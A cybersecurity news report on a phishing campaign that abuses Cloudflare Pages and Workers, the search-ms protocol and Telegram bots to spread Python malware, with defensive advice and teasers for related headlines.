A sophisticated phishing campaign orchestrated by a Russian-speaking threat actor has been uncovered, revealing the abuse of Cloudflare services and Telegram for malicious purposes.
Researchers at Hunt.io have identified this new wave of attacks, which employs Cloudflare-branded phishing pages and advanced tactics to evade detection.
The campaign utilizes Cloudflare’s Pages.dev and Workers.dev platforms typically used for legitimate static website hosting and serverless JavaScript execution to deliver phishing lures.
These phishing pages impersonate Digital Millennium Copyright Act (DMCA) takedown notices, pressuring victims into downloading malicious files disguised as PDFs.
The attackers exploit the “search-ms” protocol to initiate downloads of Windows shortcut (.lnk) files that trigger a malware infection chain upon execution.
The phishing lures direct victims to domains hosted on Cloudflare infrastructure, such as “pages.dev” and “workers.dev,” where clicking on a “Get Document” button initiates the infection process.
The malicious .lnk file, disguised as a PDF, executes a PowerShell script that downloads additional payloads from an open directory hosted on a compromised server.
This includes a ZIP archive containing Python-based malware and a legitimate Python executable.
Once extracted, the malware establishes persistence by creating shortcuts in the Windows startup folder and communicates with Pyramid Command-and-Control (C2) servers.
Researchers noted incremental changes in the malware’s delivery mechanism, including obfuscation techniques to frustrate analysis.
For instance, configuration data in the Python script is now encoded with additional junk characters before being decoded.
Despite these modifications, the overall infection logic remains consistent with earlier campaigns linked to the same actor.
A notable evolution in this campaign is the integration of Telegram for victim tracking.
The malware uses a PowerShell script to send the external IP address of infected hosts to an attacker-operated Telegram bot.
This is achieved via hardcoded bot tokens and chat IDs embedded in the script.
The Telegram group associated with this activity, titled “ПШ КОД ЗАПУСК” (translated as “PS CODE LAUNCH”), appears to coordinate operations among several members, including an administrator and bot operator.
Despite their technical sophistication, the attackers continue to exhibit operational security (OPSEC) lapses, such as leaving open directories exposed on their servers.
These directories reveal details about their infrastructure and malware components, enabling researchers to map their activities.
Over 20 domains leveraging these open directories have been identified, further exposing the scale of the operation.
This campaign underscores the abuse of trusted services like Cloudflare and Telegram by cybercriminals to mask their operations and evade detection.
The use of legitimate platforms not only lends credibility to phishing pages but also complicates efforts to identify malicious activity.
Additionally, the exploitation of protocol handlers like “search-ms” highlights gaps in endpoint monitoring that attackers continue to exploit.
Security teams are advised to monitor for signs of abuse involving Cloudflare domains and protocol handlers while remaining vigilant against open directories serving malicious payloads.
Integrating DevOps Security practices can further strengthen detection and response capabilities, especially in monitoring CI/CD pipelines and infrastructure configurations.
Enhanced scrutiny of Telegram-based communications may also aid in identifying emerging threats.
As this threat actor evolves its tactics, organizations must adapt their defenses accordingly to mitigate risks posed by increasingly sophisticated phishing campaigns.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
The popular network mapping and security auditing tool Nmap has released version 7.96, featuring a…
Cisco has issued an urgent security advisory (ID: cisco-sa-iosxe-privesc-su7scvdp) following the discovery of multiple privilege…
Cisco has issued an urgent security advisory (cisco-sa-twamp-kV4FHugn) warning of a critical vulnerability in its…
OpenCTI (Open Cyber Threat Intelligence) stands out as a free, open source platform specifically designed…
The notorious LockBit ransomware group, once considered one of the world’s most prolific cyber extortion…
A critical security flaw has been discovered in Cisco IOS XE Wireless LAN Controllers (WLCs),…